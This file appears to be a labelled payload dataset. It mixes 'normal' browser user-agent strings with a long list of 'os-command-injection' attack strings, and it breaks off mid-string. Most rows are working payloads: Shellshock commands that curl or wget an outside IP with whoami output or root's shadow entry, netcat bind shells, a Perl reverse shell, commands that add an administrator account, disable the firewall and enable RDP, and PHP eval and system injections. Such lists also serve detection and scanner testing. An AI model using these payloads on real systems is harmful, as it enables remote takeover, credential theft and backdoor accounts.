Gecko) Version/4.0.5 Mobile/8B119 Safari/6533.24.4' +normal,'Mozilla/5.0 (Linux; Android 11) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/28.0.852.0 Safari/535.0' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Trident/3.1)' +normal,'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/535.28.3 (KHTML, like Gecko) Version/5.0 Safari/535.28.3' +normal,'Mozilla/5.0 (Windows; U; Windows NT 5.01) AppleWebKit/532.9.6 (KHTML, like Gecko) Version/4.1 Safari/532.9.6' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_6 like Mac OS X) AppleWebKit/535.1 (KHTML, like Gecko) FxiOS/10.9u2345.0 Mobile/06G828 Safari/535.1' +normal,'Opera/8.10.(Windows NT 5.1; es-PE) Presto/2.9.185 Version/12.00' +normal,'Opera/8.18.(Windows NT 6.2; dv-MV) Presto/2.9.166 Version/11.00' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.0; Trident/3.1)' +normal,'Mozilla/5.0 (Linux; Android 10) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/24.0.849.0 Safari/534.1' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows 98; Trident/4.1)' +normal,'Mozilla/5.0 (Linux; Android 6.0) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/60.0.865.0 Safari/533.1' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 4.0; Trident/4.1)' +normal,'Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/531.42.2 (KHTML, like Gecko) Version/5.0.5 Safari/531.42.2' +normal,'Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/534.3.5 (KHTML, like Gecko) Version/4.0.2 Safari/534.3.5' +os-command-injection,'<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->' +os-command-injection,'<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->' +os-command-injection,'<!--#exec%20cmd="/usr/bin/id;-->' +os-command-injection,'<!--#exec%20cmd="/usr/bin/id;-->' +os-command-injection,'/index.html|id|' +os-command-injection,';id;' +os-command-injection,';id' +os-command-injection,';netstat -a;' +os-command-injection,';id;' +os-command-injection,'|id' +os-command-injection,'|/usr/bin/id' +os-command-injection,'|id|' +os-command-injection,'|/usr/bin/id|' +os-command-injection,'||/usr/bin/id|' +os-command-injection,'|id;' +os-command-injection,'||/usr/bin/id;' +os-command-injection,';id|' +os-command-injection,';|/usr/bin/id|' +os-command-injection,'\n/bin/ls -al\n' +os-command-injection,'\n/usr/bin/id\n' +os-command-injection,'\nid\n' +os-command-injection,'\n/usr/bin/id;' +os-command-injection,'\nid;' +os-command-injection,'\n/usr/bin/id|' +os-command-injection,'\nid|' +os-command-injection,';/usr/bin/id\n' +os-command-injection,'`' +os-command-injection,'||' +os-command-injection,'|' +os-command-injection,';' +os-command-injection,''' +os-command-injection,''"' +os-command-injection,'"' +os-command-injection,'"'' +os-command-injection,'&' +os-command-injection,'&&' +os-command-injection,'%0a' +os-command-injection,'%0a%0d' +os-command-injection,'%0Acat%20/etc/passwd' +os-command-injection,'%0Aid' +os-command-injection,'%0a id %0a' +os-command-injection,'%0Aid%0A' +os-command-injection,'%0a ping -i 30 127.0.0.1 %0a' +os-command-injection,'%0A/usr/bin/id' +os-command-injection,'%0A/usr/bin/id%0A' +os-command-injection,'%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1' +os-command-injection,'%20{${phpinfo()}}' +os-command-injection,'%20{${sleep(20)}}' +os-command-injection,'%20{${sleep(3)}}' +os-command-injection,'a|id|' +os-command-injection,'a;id|' +os-command-injection,'a;id;' +os-command-injection,'a;id\n' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"' +os-command-injection,'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"' +os-command-injection,'() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"' +os-command-injection,'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"' +os-command-injection,'cat /etc/hosts' +os-command-injection,'$(`cat /etc/passwd`)' +os-command-injection,'cat /etc/passwd' +os-command-injection,'() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12' +os-command-injection,'| curl http://crowdshield.com/.testing/rce.txt' +os-command-injection,'& curl http://crowdshield.com/.testing/rce.txt' +os-command-injection,'; curl https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'&& curl https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'curl https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt' +os-command-injection,'$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)' +os-command-injection,'dir' +os-command-injection,'| dir' +os-command-injection,'; dir' +os-command-injection,'$(`dir`)' +os-command-injection,'& dir' +os-command-injection,'&&dir' +os-command-injection,'&& dir' +os-command-injection,'| dir C:\' +os-command-injection,'; dir C:\' +os-command-injection,'& dir C:\' +os-command-injection,'&& dir C:\' +os-command-injection,'dir C:\' +os-command-injection,'| dir C:\Documents and Settings\*' +os-command-injection,'; dir C:\Documents and Settings\*' +os-command-injection,'& dir C:\Documents and Settings\*' +os-command-injection,'&& dir C:\Documents and Settings\*' +os-command-injection,'dir C:\Documents and Settings\*' +os-command-injection,'| dir C:\Users' +os-command-injection,'; dir C:\Users' +os-command-injection,'& dir C:\Users' +os-command-injection,'&& dir C:\Users' +os-command-injection,'dir C:\Users' +os-command-injection,';echo%20''' +os-command-injection,'echo ''// XXXXXXXXXXX' +os-command-injection,'| echo "" > rfi.php' +os-command-injection,'; echo "" > rfi.php' +os-command-injection,'& echo "" > rfi.php' +os-command-injection,'&& echo "" > rfi.php' +os-command-injection,'echo "" > rfi.php' +os-command-injection,'| echo "" > dir.php' +os-command-injection,'; echo "" > dir.php' +os-command-injection,'& echo "" > dir.php' +os-command-injection,'&& echo "" > dir.php' +os-command-injection,'echo "" > dir.php' +os-command-injection,'| echo "" > cmd.php' +os-command-injection,'; echo "" > cmd.php' +os-command-injection,'& echo "" > cmd.php' +os-command-injection,'&& echo "" > cmd.php' +os-command-injection,'echo "" > cmd.php' +os-command-injection,';echo ''' +os-command-injection,'echo ''// XXXXXXXXXXX' +os-command-injection,'echo ''// XXXXXXXXXXX' +os-command-injection,'| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl' +os-command-injection,'; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl' +os-command-injection,'& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl' +os-command-injection,'&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl' +os-command-injection,'echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl' +os-command-injection,'() { :;}; echo vulnerable 10' +os-command-injection,'eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')' +os-command-injection,'eval('ls')' +os-command-injection,'eval('pwd')' +os-command-injection,'eval('pwd');' +os-command-injection,'eval('sleep 5')' +os-command-injection,'eval('sleep 5');' +os-command-injection,'eval('whoami')' +os-command-injection,'eval('whoami');' +os-command-injection,'exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')' +os-command-injection,'exec('ls')' +os-command-injection,'exec('pwd')' +os-command-injection,'exec('pwd');' +os-command-injection,'exec('sleep 5')' +os-command-injection,'exec('sleep 5');' +os-command-injection,'exec('whoami')' +os-command-injection,'exec('whoami');' +os-command-injection,';{$_GET["cmd"]}' +os-command-injection,'`id`' +os-command-injection,'|id' +os-command-injection,'| id' +os-command-injection,';id' +os-command-injection,';id|' +os-command-injection,';id;' +os-command-injection,'& id' +os-command-injection,'&&id' +os-command-injection,';id\n' +os-command-injection,'ifconfig' +os-command-injection,'| ifconfig' +os-command-injection,'; ifconfig' +os-command-injection,'& ifconfig' +os-command-injection,'&& ifconfig' +os-command-injection,'/index.html|id|' +os-command-injection,'ipconfig' +os-command-injection,'| ipconfig /all' +os-command-injection,'; ipconfig /all' +os-command-injection,'& ipconfig /all' +os-command-injection,'&& ipconfig /all' +os-command-injection,'ipconfig /all' +os-command-injection,'ls' +os-command-injection,'$(`ls`)' +os-command-injection,'| ls -l /' +os-command-injection,'; ls -l /' +os-command-injection,'& ls -l /' +os-command-injection,'&& ls -l /' +os-command-injection,'ls -l /' +os-command-injection,'| ls -laR /etc' +os-command-injection,'; ls -laR /etc' +os-command-injection,'& ls -laR /etc' +os-command-injection,'&& ls -laR /etc' +os-command-injection,'| ls -laR /var/www' +os-command-injection,'; ls -laR /var/www' +os-command-injection,'& ls -laR /var/www' +os-command-injection,'&& ls -laR /var/www' +os-command-injection,'| ls -l /etc/' +os-command-injection,'; ls -l /etc/' +os-command-injection,'& ls -l /etc/' +os-command-injection,'&& ls -l /etc/' +os-command-injection,'ls -l /etc/' +os-command-injection,'ls -lh /etc/' +os-command-injection,'| ls -l /home/*' +os-command-injection,'; ls -l /home/*' +os-command-injection,'& ls -l /home/*' +os-command-injection,'&& ls -l /home/*' +os-command-injection,'ls -l /home/*' +os-command-injection,'*; ls -lhtR /var/www/' +os-command-injection,'| ls -l /tmp' +os-command-injection,'; ls -l /tmp' +os-command-injection,'& ls -l /tmp' +os-command-injection,'&& ls -l /tmp' +os-command-injection,'ls -l /tmp' +os-command-injection,'| ls -l /var/www/*' +os-command-injection,'; ls -l /var/www/*' +os-command-injection,'& ls -l /var/www/*' +os-command-injection,'&& ls -l /var/www/*' +os-command-injection,'ls -l /var/www/*' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'\n' +os-command-injection,'\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`' +os-command-injection,'\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`' +os-command-injection,'\n/bin/ls -al\n' +os-command-injection,'| nc -lvvp 4444 -e /bin/sh|' +os-command-injection,'; nc -lvvp 4444 -e /bin/sh;' +os-command-injection,'& nc -lvvp 4444 -e /bin/sh&' +os-command-injection,'&& nc -lvvp 4444 -e /bin/sh &' +os-command-injection,'nc -lvvp 4444 -e /bin/sh' +os-command-injection,'nc -lvvp 4445 -e /bin/sh &' +os-command-injection,'nc -lvvp 4446 -e /bin/sh|' +os-command-injection,'nc -lvvp 4447 -e /bin/sh;' +os-command-injection,'nc -lvvp 4448 -e /bin/sh&' +os-command-injection,'\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n' +os-command-injection,'\necho INJECTX\nexit\n\033[2Asleep 5\n' +os-command-injection,'\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n' +os-command-injection,'| net localgroup Administrators hacker /ADD' +os-command-injection,'; net localgroup Administrators hacker /ADD' +os-command-injection,'& net localgroup Administrators hacker /ADD' +os-command-injection,'&& net localgroup Administrators hacker /ADD' +os-command-injection,'net localgroup Administrators hacker /ADD' +os-command-injection,'| netsh firewall set opmode disable' +os-command-injection,'; netsh firewall set opmode disable' +os-command-injection,'& netsh firewall set opmode disable' +os-command-injection,'&& netsh firewall set opmode disable' +os-command-injection,'netsh firewall set opmode disable' +os-command-injection,'netstat' +os-command-injection,';netstat -a;' +os-command-injection,'| netstat -an' +os-command-injection,'; netstat -an' +os-command-injection,'& netstat -an' +os-command-injection,'&& netstat -an' +os-command-injection,'netstat -an' +os-command-injection,'| net user hacker Password1 /ADD' +os-command-injection,'; net user hacker Password1 /ADD' +os-command-injection,'& net user hacker Password1 /ADD' +os-command-injection,'&& net user hacker Password1 /ADD' +os-command-injection,'net user hacker Password1 /ADD' +os-command-injection,'| net view' +os-command-injection,'; net view' +os-command-injection,'& net view' +os-command-injection,'&& net view' +os-command-injection,'net view' +os-command-injection,'\nid|' +os-command-injection,'\nid;' +os-command-injection,'\nid\n' +os-command-injection,'\n/usr/bin/id\n' +os-command-injection,'perl -e 'print "X"x1024'' +os-command-injection,'|| perl -e 'print "X"x16096'' +os-command-injection,'| perl -e 'print "X"x16096'' +os-command-injection,'; perl -e 'print "X"x16096'' +os-command-injection,'& perl -e 'print "X"x16096'' +os-command-injection,'&& perl -e 'print "X"x16096'' +os-command-injection,'perl -e 'print "X"x16384'' +os-command-injection,'; perl -e 'print "X"x2048'' +os-command-injection,'& perl -e 'print "X"x2048'' +os-command-injection,'&& perl -e 'print "X"x2048'' +os-command-injection,'perl -e 'print "X"x2048'' +os-command-injection,'|| perl -e 'print "X"x4096'' +os-command-injection,'| perl -e 'print "X"x4096'' +os-command-injection,'; perl -e 'print "X"x4096'' +os-command-injection,'& perl -e 'print "X"x4096'' +os-command-injection,'&& perl -e 'print "X"x4096'' +os-command-injection,'perl -e 'print "X"x4096'' +os-command-injection,'|| perl -e 'print "X"x8096'' +os-command-injection,'| perl -e 'print "X"x8096'' +os-command-injection,'; perl -e 'print "X"x8096'' +os-command-injection,'&& perl -e 'print "X"x8096'' +os-command-injection,'perl -e 'print "X"x8192'' +os-command-injection,'perl -e 'print "X"x81920'' +os-command-injection,'|| phpinfo()' +os-command-injection,'| phpinfo()' +os-command-injection,'{${phpinfo()}}' +os-command-injection,';phpinfo()' +os-command-injection,';phpinfo();//' +os-command-injection,'';phpinfo();//' +os-command-injection,'{${phpinfo()}}' +os-command-injection,'& phpinfo()' +os-command-injection,'&& phpinfo()' +os-command-injection,'phpinfo()' +os-command-injection,'phpinfo();' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,'' +os-command-injection,':phpversion();' +os-command-injection,'`ping 127.0.0.1`' +os-command-injection,'& ping -i 30 127.0.0.1 &' +os-command-injection,'& ping -n 30 127.0.0.1 &' +os-command-injection,';${@print(md5(RCEVulnerable))};' +os-command-injection,'${@print("RCEVulnerable")}' +os-command-injection,'${@print(system($_SERVER['HTTP_USER_AGENT']))}' +os-command-injection,'pwd' +os-command-injection,'| pwd' +os-command-injection,'; pwd' +os-command-injection,'& pwd' +os-command-injection,'&& pwd' +os-command-injection,'\r' +os-command-injection,'| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' +os-command-injection,'; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' +os-command-injection,'& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' +os-command-injection,'&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' +os-command-injection,'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' +os-command-injection,'\r\n' +os-command-injection,'route' +os-command-injection,'| sleep 1' +os-command-injection,'; sleep 1' +os-command-injection,'& sleep 1' +os-command-injection,'&& sleep 1' +os-command-injection,'sleep 1' +os-command-injection,'|| sleep 10' +os-command-injection,'| sleep 10' +os-command-injection,'; sleep 10' +os-command-injection,'{${sleep(10)}}' +os-command-injection,'& sleep 10' +os-command-injection,'&& sleep 10' +os-command-injection,'sleep 10' +os-command-injection,'|| sleep 15' +os-command-injection,'| sleep 15' +os-command-injection,'; sleep 15' +os-command-injection,'& sleep 15' +os-command-injection,'&& sleep 15' +os-command-injection,'{${sleep(20)}}' +os-command-injection,'{${sleep(20)}}' +os-command-injection,'{${sleep(3)}}' +os-command-injection,'{${sleep(3)}}' +os-command-injection,'| sleep 5' +os-command-injection,'; sleep 5' +os-command-injection,'& sleep 5' +os-command-injection,'&& sleep 5' +os-command-injection,'sleep 5' +os-command-injection,'{${sleep(hexdec(dechex(20)))}}' +os-command-injection,'{${sleep(hexdec(dechex(20)))}}' +os-command-injection,'sysinfo' +os-command-injection,'| sysinfo' +os-command-injection,'; sysinfo' +os-command-injection,'& sysinfo' +os-command-injection,'&& sysinfo' +os-command-injection,';system('cat%20/etc/passwd')' +os-command-injection,'system('cat C:\boot.ini');' +os-command-injection,'system('cat config.php');' +os-command-injection,'system('cat /etc/passwd');' +os-command-injection,'|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');' +os-command-injection,'| system('curl https://crowdshield.com/.testing/rce_vuln.txt');' +os-command-injection,'; system('curl https://crowdshield.com/.testing/rce_vuln.txt');' +os-command-injection,'& system('curl https://crowdshield.com/.testing/rce_vuln.txt');' +os-command-injection,'&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');' +os-command-injection,'system('curl https://crowdshield.com/.testing/rce_vuln.txt')' +os-command-injection,'system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')' +os-command-injection,'system('curl https://xerosecurity.com/.testing/rce_vuln.txt');' +os-command-injection,'system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX